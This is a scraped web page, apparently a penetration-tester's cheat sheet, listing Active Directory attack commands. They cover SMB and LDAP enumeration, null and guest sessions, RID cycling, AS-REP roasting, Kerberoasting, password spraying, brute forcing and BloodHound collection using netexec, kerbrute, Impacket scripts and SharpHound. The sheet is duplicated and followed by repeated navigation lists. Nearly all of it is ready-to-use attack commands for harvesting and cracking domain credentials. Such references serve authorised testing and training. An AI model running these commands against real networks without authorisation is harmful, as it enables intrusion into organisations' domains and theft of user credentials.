Active Directory

AD Enumeration

Basic Recon

netexec smb <target>
enum4linux -a <target>
nmap -n -sV --script "ldap* and not brute" -p 389 <target>

# null session
netexec smb <IP> -u '' -p '' --shares
# guest
netexec smb <IP> -u 'guest' -p '' --shares

User Enumeration

kerbrute userenum -d <domain> [--dc <target>] users.txt

netexec smb <target> [-u 'guest' -p ''] --users
rpcdump.py [[domain/]guest:@]<target>

RID Cycling

netexec smb [-u 'guest' -p ''] --rid-brute <target>
lookupsid.py [-no-pass] [[domain/]guest:@]<target>

AS-REP Roast

With a valid username list

GetNPUsers.py -no-pass -usersfile valid_users.txt <domain>/

With valid credentials

GetNPUsers.py '<domain>/<user>:<password>' -request
netexec ldap <target> -u '<user>' -p '<password>' --asreproast asreproast.txt

Kerberoast

If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) it's because of your local time, you need to synchronise the host with the DC. There are a few options:

ntpdate <target>
rdate -n <target>

GetUserSPNs.py -request [-dc-ip <target>] <domain>/<user>:<password>
netexec ldap <target> -u '<user>' -p '<password>' --kerberoasting kerberoasting.txt

Password Spraying / Brute Forcing

Password spraying

netexec smb <target> -u valid_users.txt -p '<password>'
kerbrute passwordspray -d <domain> [--dc <target>] valid_users.txt '<password>'

Brute forcing

netexec smb <target> -u valid_users.txt -p passwords.txt
kerbrute bruteuser -d <domain> [--dc <target>] passwords.txt '<user>'

BloodHound

BloodHound Python

# legacy
bloodhound-python -d '<domain>' -u '<user>' -p '<password>' [-ns '<nameserver>'] -c All --zip
# community edition
bloodhound-ce-python -d '<domain>' -u '<user>' -p '<password>' [-ns '<nameserver>'] -c All --zip

Netexec

netexec ldap <target> -u '<user>' -p '<password>' --bloodhound -c All

SharpHound

https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

# exe
.\SharpHound.exe -CollectionMethods All
# ps1
. .\SharpHound.ps1; Invoke-BloodHound -CollectionMethods All -OutputDirectory .

Last updated 1 month ago

Active Directory

AD Enumeration

Basic Recon

netexec smb <target>
enum4linux -a <target>
nmap -n -sV --script "ldap* and not brute" -p 389 <target>

# null session
netexec smb <IP> -u '' -p '' --shares
# guest
netexec smb <IP> -u 'guest' -p '' --shares

User Enumeration

kerbrute userenum -d <domain> [--dc <target>] users.txt

netexec smb <target> [-u 'guest' -p ''] --users
rpcdump.py [[domain/]guest:@]<target>

RID Cycling

netexec smb [-u 'guest' -p ''] --rid-brute <target>
lookupsid.py [-no-pass] [[domain/]guest:@]<target>

AS-REP Roast

With a valid username list

GetNPUsers.py -no-pass -usersfile valid_users.txt <domain>/

With valid credentials

GetNPUsers.py '<domain>/<user>:<password>' -request
netexec ldap <target> -u '<user>' -p '<password>' --asreproast asreproast.txt

Kerberoast

ntpdate <target>
rdate -n <target>

GetUserSPNs.py -request [-dc-ip <target>] <domain>/<user>:<password>
netexec ldap <target> -u '<user>' -p '<password>' --kerberoasting kerberoasting.txt

Password Spraying / Brute Forcing

Password spraying

netexec smb <target> -u valid_users.txt -p '<password>'
kerbrute passwordspray -d <domain> [--dc <target>] valid_users.txt '<password>'

Brute forcing

netexec smb <target> -u valid_users.txt -p passwords.txt
kerbrute bruteuser -d <domain> [--dc <target>] passwords.txt '<user>'

BloodHound

BloodHound Python

# legacy
bloodhound-python -d '<domain>' -u '<user>' -p '<password>' [-ns '<nameserver>'] -c All --zip
# community edition
bloodhound-ce-python -d '<domain>' -u '<user>' -p '<password>' [-ns '<nameserver>'] -c All --zip

Netexec

netexec ldap <target> -u '<user>' -p '<password>' --bloodhound -c All

SharpHound

https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

# exe
.\SharpHound.exe -CollectionMethods All
# ps1
. .\SharpHound.ps1; Invoke-BloodHound -CollectionMethods All -OutputDirectory .

Last updated 1 month ago

Active Directory

AD Enumeration

Basic Recon

Shares

User Enumeration

AS-REP Roast

Kerberoast

Password Spraying / Brute Forcing

BloodHound

BloodHound Python

Netexec

SharpHound

Active Directory

AD Enumeration

Basic Recon

Shares

User Enumeration

AS-REP Roast

Kerberoast

Password Spraying / Brute Forcing

BloodHound

BloodHound Python

Netexec

SharpHound